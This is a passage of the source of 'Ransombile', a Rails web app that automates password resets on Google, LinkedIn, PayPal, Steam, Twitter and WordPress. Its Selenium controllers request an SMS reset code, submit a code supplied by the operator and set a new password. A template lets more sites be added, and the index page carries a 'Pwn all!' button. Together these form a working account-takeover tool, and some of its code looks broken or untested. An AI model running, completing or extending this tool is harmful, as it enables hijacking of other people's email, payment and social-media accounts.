44 | $selenium_driver.find_element(:xpath, "//span[text()='Try another way']").click
45 |
46 | wait.until { $selenium_driver.find_element(:id, "phoneNumberId").displayed? }
47 | $selenium_driver.find_element(:id, "phoneNumberId").send_keys params[:phone]
48 | $selenium_driver.find_element(:id, "next").click
49 | end
50 | end
51 |
52 | wait.until { $selenium_driver.find_element(:id => "idvPreresteredPhoneSms").displayed? }
53 | $selenium_driver.find_element(:id, "idvPreresteredPhoneSms").click
54 |
55 | begin
56 | wait.until { $selenium_driver.find_element(:name => "phoneNumber").displayed? }
57 | $selenium_driver.find_element(:name, "phoneNumber").clear
58 | puts params[:phone]
59 | $selenium_driver.find_element(:name, "phoneNumber").send_keys params[:phone]
60 | puts params[:phone]
61 | rescue Selenium::WebDriver::Error::NoSuchElementError, Selenium::WebDriver::Error::TimeOutError=> e
62 | puts "A/B testing related error. All good!"
63 | end
64 |
65 | render :json => {"website": "google", "status": "Waiting for temp code..."}
66 | rescue Exception => e
67 | puts e.to_s
68 | puts e.backtrace
69 | render :status => 500, :json => {"website": "google", "status": "Password reset failed!"}
70 | end
71 | end
72 |
73 |
74 |
75 |
76 | def finish
77 | begin
78 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
79 | begin
80 | wait.until { $selenium_driver.find_element(:id => "idvPreregisteredPhonePin").displayed? }
81 | $google_driver.find_element(:id, "idvPreregisteredPhonePin").clear
82 | $google_driver.find_element(:id, "idvPreregisteredPhonePin").send_keys params[:temp_code]
83 | $google_driver.find_element(:id, "submit").click
84 | rescue Selenium::WebDriver::Error::TimeOutError # Handles Google's A/B testing
85 | wait.until { $selenium_driver.find_element(:id, "idvPin").displayed? }
86 | $google_driver.find_element(:id, "idvPin").clear
87 | $google_driver.find_element(:id, "idvPin").send_keys params[:temp_code]
88 | $google_driver.find_element(:id, "idvPin").send_keys :return;
89 | end
90 |
91 | wait.until { $selenium_driver.find_element(:id => "Password").displayed? }
92 | $google_driver.find_element(:id, "Password").clear
93 | $google_driver.find_element(:id, "Password").send_keys params[:password]
94 | $google_driver.find_element(:id, "ConfirmPassword").clear
95 | $google_driver.find_element(:id, "ConfirmPassword").send_keys params[:password]
96 | $google_driver.find_element(:id, "submit").click
97 |
98 | begin
99 | wait = Selenium::WebDriver::Wait.new(:timeout => 1)
100 | wait.until { $google_driver.find_element(:id => "Password").displayed? }
101 | render :status => 500, :json => {"website": "google", "status": "Password reset failed!"}
102 | rescue Selenium::WebDriver::Error::TimeOutError => e
103 | render :json => {"website": "google", "status": "Password reset successful!"}
104 | end
105 | rescue Exception => e
106 | puts e.to_s
107 | puts e.backtrace
108 | render :status => 500, :json => {"website": "google", "status": "Password reset failed!"}
109 | end
110 | end
111 |
112 |
113 |
114 | end
115 |
--------------------------------------------------------------------------------
/app/controllers/linkedin_controller.rb:
--------------------------------------------------------------------------------
1 | class LinkedinController < ApplicationController
2 | $selenium_driver = nil
3 |
4 | # To start the password reset process using the email
5 | def initiate
6 | begin
7 | $selenium_driver = Selenium::WebDriver.for :firefox
8 | base_url = "https://www.linkedin.com/uas/request-password-reset"
9 | $selenium_driver.get(base_url)
10 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
11 |
12 | begin # Handles A/B testing
13 | wait.until { $selenium_driver.find_element(:id => "username").displayed? }
14 | $selenium_driver.find_element(:id, "username").clear
15 | $selenium_driver.find_element(:id, "username").send_keys params[:email]
16 | $selenium_driver.find_element(:id, "reset-password-submit-button").click
17 |
18 | wait.until { $selenium_driver.find_element(:id => "sms").displayed? }
19 | $selenium_driver.find_element(:xpath, "//label[contains(@for,'sms')]").click
20 | $selenium_driver.find_element(:id, "reset-password-submit-button").click
21 | rescue Selenium::WebDriver::Error::TimeOutError => e
22 | wait.until { $selenium_driver.find_element(:id => "userName-requestPasswordReset").displayed? }
23 | $selenium_driver.find_element(:id, "userName-requestPasswordReset").clear
24 | $selenium_driver.find_element(:id, "userName-requestPasswordReset").send_keys params[:email]
25 | $selenium_driver.find_element(:id, "btnSubmitResetRequest").click
26 |
27 | wait.until { $selenium_driver.find_element(:id => "SMS-passwordResetOption-passwordResetOption").displayed? }
28 | $selenium_driver.find_element(:id, "SMS-passwordResetOption-passwordResetOption").click
29 | $selenium_driver.find_element(:id, "btn-submit").click
30 | end
31 |
32 | render :json => {"website": "linkedin", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name
33 |
34 | rescue Exception => e
35 | puts e.to_s
36 | puts e.backtrace
37 | render :status => 500, :json => {"website": "linkedin", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
38 | end
39 | end
40 |
41 |
42 |
43 | # To handle the temp code input, set new password and finish the password reset process
44 | def finish
45 | begin
46 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
47 | begin # Handles A/B testing
48 | wait.until { $selenium_driver.find_element(:id => "newPassword").displayed? }
49 | $selenium_driver.find_element(:id, "newPassword").clear
50 | $selenium_driver.find_element(:id, "newPassword").send_keys params[:password]
51 | $selenium_driver.find_element(:id, "confirmPassword").clear
52 | $selenium_driver.find_element(:id, "confirmPassword").send_keys params[:password]
53 | $selenium_driver.find_element(:id, "reset-password-submit-button").click
54 | rescue Selenium::WebDriver::Error::TimeOutError => e
55 | wait.until { $selenium_driver.find_element(:id => "challenge-input").displayed? }
56 | $selenium_driver.find_element(:id, "challenge-input").clear
57 | $selenium_driver.find_element(:id, "challenge-input").send_keys params[:temp_code]
58 |
59 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
60 | wait.until { $selenium_driver.find_element(:css, "div.cp-challenge-actions.form-actions > input.btn-submit").displayed? }
61 | $selenium_driver.find_element(:css, "div.cp-challenge-actions.form-actions > input.btn-submit").click
62 |
63 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
64 | wait.until { $selenium_driver.find_element(:id => "new_password-newPassword-passwordReset").displayed? }
65 | $selenium_driver.find_element(:id, "new_password-newPassword-passwordReset").clear
66 | $selenium_driver.find_element(:id, "new_password-newPassword-passwordReset").send_keys params[:password]
67 | $selenium_driver.find_element(:id, "new_password_again-newPassword-passwordReset").clear
68 | $selenium_driver.find_element(:id, "new_password_again-newPassword-passwordReset").send_keys params[:password]
69 | $selenium_driver.find_element(:id, "reset").click
70 | end
71 |
72 | render :json => {"website": "linkedin", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name
73 |
74 | rescue Exception => e
75 | puts e.to_s
76 | puts e.backtrace
77 | render :status => 500, :json => {"website": "linkedin", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
78 | end
79 | end
80 |
81 |
82 | end
--------------------------------------------------------------------------------
/app/controllers/paypal_controller.rb:
--------------------------------------------------------------------------------
1 | class PaypalController < ApplicationController
2 | $selenium_driver = nil
3 |
4 | # To start the password reset process using the email
5 | def initiate
6 | begin
7 | $selenium_driver = Selenium::WebDriver.for :firefox
8 | base_url = "https://www.paypal.com/authflow/password-recovery/"
9 | $selenium_driver.get(base_url)
10 |
11 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
12 | wait.until { $selenium_driver.find_element(:name => "email").displayed? }
13 | wait.until { $selenium_driver.find_element(:name => "email").enabled? }
14 | $selenium_driver.find_element(:name, "email").click
15 | $selenium_driver.find_element(:name, "email").clear
16 | $selenium_driver.find_element(:name, "email").send_keys params[:email]
17 |
18 | $selenium_driver.find_element(:name, "submitForgotPasswordForm").click
19 | wait.until { $selenium_driver.find_element(:name => "submit").displayed? }
20 | wait.until { $selenium_driver.find_element(:id, "sms-challenge-option").displayed? }
21 | wait.until { $selenium_driver.find_element(:id, "sms-challenge-option").enabled? }
22 | $selenium_driver.find_element(:id, "sms-challenge-option").click
23 | $selenium_driver.find_element(:name, "submit").click
24 |
25 | render :json => {"website": "paypal", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name
26 |
27 | rescue Exception => e
28 | puts e.to_s
29 | puts e.backtrace
30 | render :status => 500, :json => {"website": "paypal", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
31 | end
32 | end
33 |
34 |
35 |
36 | # To handle the temp code input, set new password and finish the password reset process
37 | def finish
38 | begin
39 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
40 | wait.until { $paypal_driver.find_element(:id => "smsAnswer").displayed? }
41 | $paypal_driver.find_element(:id, "smsAnswer").send_keys params[:temp_code]
42 | $paypal_driver.find_element(:name, "smsPin").click
43 |
44 | wait.until { $paypal_driver.find_element(:name => "password").displayed? }
45 | $paypal_driver.find_element(:name, "password").send_keys params[:password]
46 | $paypal_driver.find_element(:name, "confirmPassword").send_keys params[:password]
47 |
48 | wait.until { $paypal_driver.find_element(:name => "submitPassword").displayed? }
49 | wait.until { $paypal_driver.find_element(:name => "submitPassword").enabled? }
50 | $paypal_driver.find_element(:name, "submitPassword").click
51 |
52 | render :json => {"website": "paypal", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name
53 |
54 | rescue Exception => e
55 | puts e.to_s
56 | puts e.backtrace
57 | render :status => 500, :json => {"website": "paypal", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
58 | end
59 | end
60 |
61 |
62 | end
63 |
--------------------------------------------------------------------------------
/app/controllers/ransombile_controller.rb:
--------------------------------------------------------------------------------
1 | require 'net/imap'
2 |
3 | class RansombileController < ApplicationController
4 |
5 | $email = ""
6 | $password = ""
7 |
8 | def checkMail
9 | begin
10 | imap = Net::IMAP.new("imap.googlemail.com", 993, true, nil, false)
11 | imap.login($email, $password)
12 | imap.examine("Inbox")
13 | emailIds = imap.search(["UNSEEN"])
14 | emailData = imap.fetch(emailIds.last, "BODY[HEADER.FIELDS (FROM)]").first[1]["BODY[HEADER.FIELDS (FROM)]"].to_s
15 | regexResult = /<(.*)>/.match(emailData)
16 | emailFrom = regexResult[1]
17 | render :json => {"email": emailFrom}
18 | rescue Exception => e
19 | render :json => {"email": ""}
20 | ensure
21 | imap.logout
22 | end
23 | end
24 |
25 | end
26 |
--------------------------------------------------------------------------------
/app/controllers/steam_controller.rb:
--------------------------------------------------------------------------------
1 | class SteamController < ApplicationController
2 | $selenium_driver = nil
3 |
4 | # To start the password reset process using the email
5 | def initiate
6 | begin
7 | $selenium_driver = Selenium::WebDriver.for :firefox
8 | base_url = "https://help.steampowered.com/en/wizard/HelpWithLoginInfo"
9 | $selenium_driver.get(base_url)
10 |
11 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
12 | wait.until { $selenium_driver.find_element(:id, "forgot_login_search").displayed? }
13 | $selenium_driver.find_element(:id, "forgot_login_search").send_keys params[:email]
14 | $selenium_driver.find_element(:id, "forgot_login_search").send_keys :return
15 |
16 | # Needs testing from here on
17 | wait.until { $selenium_driver.find_element(:xpath, "//span[text()='Text an account verification']").displayed? }
18 | $selenium_driver.find_element(:xpath, "//span[text().='Text an account verification']").click
19 |
20 | render :json => {"website": "steam", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name
21 |
22 | rescue Exception => e
23 | puts e.to_s
24 | puts e.backtrace
25 | render :status => 500, :json => {"website": "steam", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
26 | end
27 | end
28 |
29 |
30 |
31 | # To handle the temp code input, set new password and finish the password reset process
32 | def finish
33 | begin
34 | wait.until { $selenium_driver.find_element(:id => "forgot_login_code").displayed? }
35 | $selenium_driver.find_element(:id => "forgot_login_code").send_keys params[:temp_code]
36 | $selenium_driver.find_element(:id => "forgot_login_code").send_keys :return
37 |
38 | render :json => {"website": "steam", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name
39 | rescue Exception => e
40 | puts e.to_s
41 | puts e.backtrace
42 | render :status => 500, :json => {"website": "steam", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
43 | end
44 | end
45 | end
46 |
--------------------------------------------------------------------------------
/app/controllers/twitter_controller.rb:
--------------------------------------------------------------------------------
1 | class TwitterController < ApplicationController
2 | $selenium_driver = nil
3 |
4 | def initiate
5 | begin
6 | $selenium_driver = Selenium::WebDriver.for :firefox
7 | base_url = "https://twitter.com/account/begin_password_reset"
8 | $selenium_driver.get(base_url)
9 |
10 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
11 | wait.until { $selenium_driver.find_element(:name => "account_identifier").displayed? }
12 | $selenium_driver.find_element(:name, "account_identifier").clear
13 | $selenium_driver.find_element(:name, "account_identifier").send_keys params[:email]
14 | $selenium_driver.find_element(:css, "input.Button").click
15 |
16 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
17 | wait.until { $selenium_driver.find_element(:name => "method").displayed? }
18 | $selenium_driver.find_element(:name, "method").click
19 | $selenium_driver.find_element(:css, "input.Button").click
20 |
21 | render :json => {"website": "twitter", "status": "Waiting for temp code..."}
22 | rescue Exception => e
23 | puts e.to_s
24 | puts e.backtrace
25 | render :status => 500, :json => {"website": "twitter", "status": "Password reset failed!"}
26 | end
27 | end
28 |
29 |
30 | def finish
31 | begin
32 | $selenium_driver.find_element(:name, "pin").clear
33 | $selenium_driver.find_element(:name, "pin").send_keys params[:temp_code]
34 | $selenium_driver.find_element(:css, "input.Button").click
35 |
36 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
37 | wait.until { $selenium_driver.find_element(:id => "password").displayed? }
38 | $selenium_driver.find_element(:id, "password").clear
39 | $selenium_driver.find_element(:id, "password").send_keys params[:password]
40 | $selenium_driver.find_element(:name, "password_confirmation").clear
41 | $selenium_driver.find_element(:name, "password_confirmation").send_keys params[:password]
42 | $selenium_driver.find_element(:css, "input.Button").click
43 |
44 | render :json => {"website": "twitter", "status": "Password reset successful!"}
45 | rescue Exception => e
46 | puts e.to_s
47 | puts e.backtrace
48 | render :status => 500, :json => {"website": "twitter", "status": "Password reset failed!"}
49 | end
50 | end
51 |
52 |
53 | end
54 |
--------------------------------------------------------------------------------
/app/controllers/website_template_controller.rb:
--------------------------------------------------------------------------------
1 | class WebsiteTemplateController < ApplicationController
2 | $selenium_driver = nil
3 |
4 | # To start the password reset process using the email
5 | def initiate
6 | begin
7 | $selenium_driver = Selenium::WebDriver.for :firefox
8 |
9 | # YOUR CODE
10 |
11 | render :json => {"website": "WEBSITE", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name
12 |
13 | rescue Exception => e
14 | puts e.to_s
15 | puts e.backtrace
16 | render :status => 500, :json => {"website": "WEBSITE", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
17 | end
18 | end
19 |
20 |
21 |
22 | # To handle the temp code input, set new password and finish the password reset process
23 | def finish
24 | begin
25 |
26 | # YOUR CODE
27 |
28 | render :json => {"website": "WEBSITE", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name
29 |
30 | rescue Exception => e
31 | puts e.to_s
32 | puts e.backtrace
33 | render :status => 500, :json => {"website": "WEBSITE", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
34 | end
35 | end
36 |
37 |
38 | end
39 |
--------------------------------------------------------------------------------
/app/controllers/wordpress_controller.rb:
--------------------------------------------------------------------------------
1 | class WordpressController < ApplicationController
2 | $selenium_driver = nil
3 |
4 | # To start the password reset process using the email
5 | def initiate
6 | begin
7 | $selenium_driver = Selenium::WebDriver.for :firefox
8 | base_url = "https://wordpress.com/wp-login.php?action=lostpassword"
9 | $selenium_driver.get(base_url)
10 |
11 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
12 | wait.until { $selenium_driver.find_element(:id => "lostpasswordform").displayed? }
13 | wait.until { $selenium_driver.find_element(:id => "user_login").enabled? }
14 | $selenium_driver.find_element(:id, "user_login").clear
15 | $selenium_driver.find_element(:id, "user_login").send_keys params[:email]
16 | $selenium_driver.find_element(:id, "wp-submit").click
17 |
18 | render :json => {"website": "wordpress", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name
19 |
20 | rescue Exception => e
21 | puts e.to_s
22 | puts e.backtrace
23 | render :status => 500, :json => {"website": "wordpress", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
24 | end
25 | end
26 |
27 |
28 |
29 | # To handle the temp code input, set new password and finish the password reset process
30 | def finish
31 | begin
32 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
33 | wait.until { $selenium_driver.find_element(:name => "recovery-sms").displayed? }
34 | $selenium_driver.find_element(:name, "recovery-sms").clear
35 | $selenium_driver.find_element(:name, "recovery-sms").send_keys params[:temp_code]
36 | $selenium_driver.find_element(:id, "wp-submit").click
37 |
38 | wait.until { $selenium_driver.find_element(:id => "pass1").displayed? }
39 | $selenium_driver.find_element(:id, "pass1").clear
40 | $selenium_driver.find_element(:id, "pass1").send_keys params[:password]
41 | wait.until { $selenium_driver.find_element(:name => "wp-submit").enabled? }
42 | $selenium_driver.find_element(:id, "wp-submit").click
43 |
44 | begin
45 | wait = Selenium::WebDriver::Wait.new(:timeout => 1)
46 | wait.until { $selenium_driver.find_element(:id => "login_error").displayed? }
47 | render :status => 500, :json => {"website": "wordpress", "status": "Password reset failed!"}
48 | rescue Selenium::WebDriver::Error::TimeOutError => e
49 | render :json => {"website": "wordpress", "status": "Password reset successful!"}
50 | end
51 |
52 | render :json => {"website": "wordpress", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name
53 |
54 | rescue Exception => e
55 | puts e.to_s
56 | puts e.backtrace
57 | render :status => 500, :json => {"website": "wordpress", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
58 | end
59 | end
60 |
61 | end
62 |
--------------------------------------------------------------------------------
/app/helpers/application_helper.rb:
--------------------------------------------------------------------------------
1 | module ApplicationHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/helpers/ebay_helper.rb:
--------------------------------------------------------------------------------
1 | module EbayHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/helpers/facebook_helper.rb:
--------------------------------------------------------------------------------
1 | module FacebookHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/helpers/google_helper.rb:
--------------------------------------------------------------------------------
1 | module GoogleHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/helpers/linkedin_helper.rb:
--------------------------------------------------------------------------------
1 | module LinkedinHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/helpers/paypal_helper.rb:
--------------------------------------------------------------------------------
1 | module PaypalHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/helpers/ransombile_helper.rb:
--------------------------------------------------------------------------------
1 | module RansombileHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/helpers/steam_helper.rb:
--------------------------------------------------------------------------------
1 | module SteamHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/helpers/twitter_helper.rb:
--------------------------------------------------------------------------------
1 | module TwitterHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/helpers/website_template_helper.rb:
--------------------------------------------------------------------------------
1 | module WebsiteTemplateHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/helpers/wordpress_helper.rb:
--------------------------------------------------------------------------------
1 | module WordpressHelper
2 | end
3 |
--------------------------------------------------------------------------------
/app/jobs/application_job.rb:
--------------------------------------------------------------------------------
1 | class ApplicationJob < ActiveJob::Base
2 | end
3 |
--------------------------------------------------------------------------------
/app/mailers/application_mailer.rb:
--------------------------------------------------------------------------------
1 | class ApplicationMailer < ActionMailer::Base
2 | default from: 'from@example.com'
3 | layout 'mailer'
4 | end
5 |
--------------------------------------------------------------------------------
/app/models/application_record.rb:
--------------------------------------------------------------------------------
1 | class ApplicationRecord < ActiveRecord::Base
2 | self.abstract_class = true
3 | end
4 |
--------------------------------------------------------------------------------
/app/models/concerns/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/app/models/concerns/.keep
--------------------------------------------------------------------------------
/app/views/layouts/application.html.erb:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Ransombile
5 | <%= csrf_meta_tags %>
6 |
7 | <%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %>
8 | <%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %>
9 |
10 |
11 |
12 | <%= yield %>
13 |
14 |
15 |
--------------------------------------------------------------------------------
/app/views/layouts/mailer.html.erb:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
8 |
9 |
10 |
11 | <%= yield %>
12 |
13 |
14 |
--------------------------------------------------------------------------------
/app/views/layouts/mailer.text.erb:
--------------------------------------------------------------------------------
1 | <%= yield %>
2 |
--------------------------------------------------------------------------------
/app/views/ransombile/index.html.erb:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | Ransombile
8 |
9 |
10 |
11 |
12 |
13 | Ransombile
14 |
15 |
16 |
17 | Password:
18 |
19 |
20 |
21 |
22 | Email:
23 |
24 |
25 |
26 | Pwn all!
27 |
28 |
29 |
30 |
31 | Google:
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 | Paypal:
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 | Facebook:
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 | Twitter:
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 | LinkedIn:
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 | Wordpress:
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 | Ebay:
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
213 |
214 |
--------------------------------------------------------------------------------
/bin/bundle:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../../Gemfile', __FILE__)
3 | load Gem.bin_path('bundler', 'bundle')
4 |
--------------------------------------------------------------------------------
/bin/rails:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | begin
3 | load File.expand_path('../spring', __FILE__)
4 | rescue LoadError => e
5 | raise unless e.message.include?('spring')
6 | end
7 | APP_PATH = File.expand_path('../config/application', __dir__)
8 | require_relative '../config/boot'
9 | require 'rails/commands'
10 |
--------------------------------------------------------------------------------
/bin/rake:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | begin
3 | load File.expand_path('../spring', __FILE__)
4 | rescue LoadError => e
5 | raise unless e.message.include?('spring')
6 | end
7 | require_relative '../config/boot'
8 | require 'rake'
9 | Rake.application.run
10 |
--------------------------------------------------------------------------------
/bin/setup:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | require 'pathname'
3 | require 'fileutils'
4 | include FileUtils
5 |
6 | # path to your application root.
7 | APP_ROOT = Pathname.new File.expand_path('../../', __FILE__)
8 |
9 | def system!(*args)
10 | system(*args) || abort("\n== Command #{args} failed ==")
11 | end
12 |
13 | chdir APP_ROOT do
14 | # This script is a starting point to setup your application.
15 | # Add necessary setup steps to this file.
16 |
17 | puts '== Installing dependencies =='
18 | system! 'gem install bundler --conservative'
19 | system('bundle check') || system!('bundle install')
20 |
21 | # puts "\n== Copying sample files =="
22 | # unless File.exist?('config/database.yml')
23 | # cp 'config/database.yml.sample', 'config/database.yml'
24 | # end
25 |
26 | puts "\n== Preparing database =="
27 | system! 'bin/rails db:setup'
28 |
29 | puts "\n== Removing old logs and tempfiles =="
30 | system! 'bin/rails log:clear tmp:clear'
31 |
32 | puts "\n== Restarting application server =="
33 | system! 'bin/rails restart'
34 | end
35 |
--------------------------------------------------------------------------------
/bin/spring:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 |
3 | # This file loads spring without using Bundler, in order to be fast.
4 | # It gets overwritten when you run the `spring binstub` command.
5 |
6 | unless defined?(Spring)
7 | require 'rubygems'
8 | require 'bundler'
9 |
10 | lockfile = Bundler::LockfileParser.new(Bundler.default_lockfile.read)
11 | spring = lockfile.specs.detect { |spec| spec.name == "spring" }
12 | if spring
13 | Gem.use_paths Gem.dir, Bundler.bundle_path.to_s, *Gem.path
14 | gem 'spring', spring.version
15 | require 'spring/binstub'
16 | end
17 | end
18 |
--------------------------------------------------------------------------------
/bin/update:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | require 'pathname'
3 | require 'fileutils'
4 | include FileUtils
5 |
6 | # path to your application root.
7 | APP_ROOT = Pathname.new File.expand_path('../../', __FILE__)
8 |
9 | def system!(*args)
10 | system(*args) || abort("\n== Command #{args} failed ==")
11 | end
12 |
13 | chdir APP_ROOT do
14 | # This script is a way to update your development environment automatically.
15 | # Add necessary update steps to this file.
16 |
17 | puts '== Installing dependencies =='
18 | system! 'gem install bundler --conservative'
19 | system('bundle check') || system!('bundle install')
20 |
21 | puts "\n== Updating database =="
22 | system! 'bin/rails db:migrate'
23 |
24 | puts "\n== Removing old logs and tempfiles =="
25 | system! 'bin/rails log:clear tmp:clear'
26 |
27 | puts "\n== Restarting application server =="
28 | system! 'bin/rails restart'
29 | end
30 |
--------------------------------------------------------------------------------
/config.ru:
--------------------------------------------------------------------------------
1 | # This file is used by Rack-based servers to start the application.
2 |
3 | require_relative 'config/environment'
4 |
5 | run Rails.application
6 |
--------------------------------------------------------------------------------
/config/application.rb:
--------------------------------------------------------------------------------
1 | require_relative 'boot'
2 |
3 | require 'rails/all'
4 |
5 | # Require the gems listed in Gemfile, including any gems
6 | # you've limited to :test, :development, or :production.
7 | Bundler.require(*Rails.groups)
8 |
9 | module Ransombile
10 | class Application < Rails::Application
11 | # Settings in config/environments/* take precedence over those specified here.
12 | # Application configuration should go into files in config/initializers
13 | # -- all .rb files in that directory are automatically loaded.
14 | end
15 | end
16 |
--------------------------------------------------------------------------------
/config/boot.rb:
--------------------------------------------------------------------------------
1 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../Gemfile', __dir__)
2 |
3 | require 'bundler/setup' # Set up gems listed in the Gemfile.
4 |
--------------------------------------------------------------------------------
/config/cable.yml:
--------------------------------------------------------------------------------
1 | development:
2 | adapter: async
3 |
4 | test:
5 | adapter: async
6 |
7 | production:
8 | adapter: redis
9 | url: redis://localhost:6379/1
10 |
--------------------------------------------------------------------------------
/config/database.yml:
--------------------------------------------------------------------------------
1 | # SQLite version 3.x
2 | # gem install sqlite3
3 | #
4 | # Ensure the SQLite 3 gem is defined in your Gemfile
5 | # gem 'sqlite3'
6 | #
7 | default: &default
8 | adapter: sqlite3
9 | pool: 5
10 | timeout: 5000
11 |
12 | development:
13 | <<: *default
14 | database: db/development.sqlite3
15 |
16 | # Warning: The database defined as "test" will be erased and
17 | # re-generated from your development database when you run "rake".
18 | # Do not set this db to the same as development or production.
19 | test:
20 | <<: *default
21 | database: db/test.sqlite3
22 |
23 | production:
24 | <<: *default
25 | database: db/production.sqlite3
26 |
--------------------------------------------------------------------------------
/config/environment.rb:
--------------------------------------------------------------------------------
1 | # Load the Rails application.
2 | require_relative 'application'
3 |
4 | # Initialize the Rails application.
5 | Rails.application.initialize!
6 |
--------------------------------------------------------------------------------
/config/environments/development.rb:
--------------------------------------------------------------------------------
1 | Rails.application.configure do
2 | # Settings specified here will take precedence over those in config/application.rb.
3 |
4 | # In the development environment your application's code is reloaded on
5 | # every request. This slows down response time but is perfect for development
6 | # since you don't have to restart the web server when you make code changes.
7 | config.cache_classes = false
8 |
9 | # Do not eager load code on boot.
10 | config.eager_load = false
11 |
12 | # Show full error reports.
13 | config.consider_all_requests_local = true
14 |
15 | # Enable/disable caching. By default caching is disabled.
16 | if Rails.root.join('tmp/caching-dev.txt').exist?
17 | config.action_controller.perform_caching = true
18 |
19 | config.cache_store = :memory_store
20 | config.public_file_server.headers = {
21 | 'Cache-Control' => 'public, max-age=172800'
22 | }
23 | else
24 | config.action_controller.perform_caching = false
25 |
26 | config.cache_store = :null_store
27 | end
28 |
29 | # Don't care if the mailer can't send.
30 | config.action_mailer.raise_delivery_errors = false
31 |
32 | config.action_mailer.perform_caching = false
33 |
34 | # Print deprecation notices to the Rails logger.
35 | config.active_support.deprecation = :log
36 |
37 | # Raise an error on page load if there are pending migrations.
38 | config.active_record.migration_error = :page_load
39 |
40 | # Debug mode disables concatenation and preprocessing of assets.
41 | # This option may cause significant delays in view rendering with a large
42 | # number of complex assets.
43 | config.assets.debug = true
44 |
45 | # Suppress logger output for asset requests.
46 | config.assets.quiet = true
47 |
48 | # Raises error for missing translations
49 | # config.action_view.raise_on_missing_translations = true
50 |
51 | # Use an evented file watcher to asynchronously detect changes in source code,
52 | # routes, locales, etc. This feature depends on the listen gem.
53 | config.file_watcher = ActiveSupport::EventedFileUpdateChecker
54 | end
55 |
--------------------------------------------------------------------------------
/config/environments/production.rb:
--------------------------------------------------------------------------------
1 | Rails.application.configure do
2 | # Settings specified here will take precedence over those in config/application.rb.
3 |
4 | # Code is not reloaded between requests.
5 | config.cache_classes = true
6 |
7 | # Eager load code on boot. This eager loads most of Rails and
8 | # your application in memory, allowing both threaded web servers
9 | # and those relying on copy on write to perform better.
10 | # Rake tasks automatically ignore this option for performance.
11 | config.eager_load = true
12 |
13 | # Full error reports are disabled and caching is turned on.
14 | config.consider_all_requests_local = false
15 | config.action_controller.perform_caching = true
16 |
17 | # Disable serving static files from the `/public` folder by default since
18 | # Apache or NGINX already handles this.
19 | config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
20 |
21 | # Compress JavaScripts and CSS.
22 | config.assets.js_compressor = :uglifier
23 | # config.assets.css_compressor = :sass
24 |
25 | # Do not fallback to assets pipeline if a precompiled asset is missed.
26 | config.assets.compile = false
27 |
28 | # `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
29 |
30 | # Enable serving of images, stylesheets, and JavaScripts from an asset server.
31 | # config.action_controller.asset_host = 'http://assets.example.com'
32 |
33 | # Specifies the header that your server uses for sending files.
34 | # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
